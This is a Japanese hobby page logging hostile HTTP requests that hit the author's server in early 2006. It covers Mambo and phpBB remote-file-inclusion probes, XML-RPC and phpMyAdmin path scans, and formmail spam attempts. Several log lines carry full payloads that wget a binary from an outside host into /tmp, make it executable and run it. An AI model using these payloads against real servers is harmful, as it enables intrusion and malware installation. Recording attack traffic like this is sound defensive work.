I&U Home > うにまま（仮）　・　 謎ログの友　・　 パスワードコレクション　・　 FormMail Scanners

謎ログ

[all] [apache] [exploit] [ftp] [robot] [webalizer] [SEO_SPAM] [others]

Mambo Serveの脆弱性を探るアクセス　▲

Name:    69-56-146-210.theplanet.com
Address:  69.56.146.210

69.56.146.210 - - [01/Mar/2006:05:41:00 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:01 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:02 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:04 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:05 +0900] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:06 +0900] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

こことここ Mambo Server のセキュリティホールらしい。 ちなみに、当方への初着弾は1月12日でした。 それにしても 219.84.105.36 って誰？ Name: 219-84-105-36-adsl-chu.static.so-net.net.tw Address: 219.84.105.36

XMLRPCの脆弱性をさぐるアクセス　▲

69.56.146.210 - - [01/Mar/2006:05:41:08 +0900] "POST /xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:09 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:10 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:12 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:13 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:14 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:15 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:16 +0900] "POST /xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:17 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:19 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

http://xoopscube.jp/modules/newbb/viewtopic.php?topic_id=10476&forum=11&post_id=50985#forumpost50985 xmlrpc.php のセキュリティホールを探している模様。

phpMyAdmin　▲

83.17.221.182 - - [21/Feb/2006:04:26:00 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 291 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:37:12 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 295 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:42:18 +0900] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 297 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:45:59 +0900] "GET /phpmyadmin2/main.php HTTP/1.0" 404 292 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:54:10 +0900] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 297 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:55:43 +0900] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 297 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:57:59 +0900] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 297 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:59:09 +0900] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 297 "-" "-"
83.17.221.182 - - [21/Feb/2006:05:01:55 +0900] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 297 "-" "-"
83.17.221.182 - - [21/Feb/2006:05:05:22 +0900] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 404 297 "-" "-"
83.17.221.182 - - [21/Feb/2006:05:07:49 +0900] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 404 301 "-" "-"
83.17.221.182 - - [21/Feb/2006:05:09:11 +0900] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 404 301 "-" "-"
83.17.221.182 - - [21/Feb/2006:05:11:30 +0900] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 404 297 "-" "-"
83.17.221.182 - - [21/Feb/2006:05:11:56 +0900] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 404 301 "-" "-"
83.17.221.182 - - [21/Feb/2006:05:12:08 +0900] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 404 301 "-" "-"

SUSE：phpMyAdmin -- リモートコード実行 だそうです。

ELF_KAIGENT.C　▲

221.25.90.15 - - [20/Feb/2006:03:24:31 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.25.90.15 - - [20/Feb/2006:03:24:32 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

ELF_KAIGENT.C

formmail　▲

24.12.104.213 - - [12/Feb/2006:00:08:43 +0900] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"
24.12.104.213 - - [12/Feb/2006:00:47:59 +0900] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"

まだこんなんおったんや。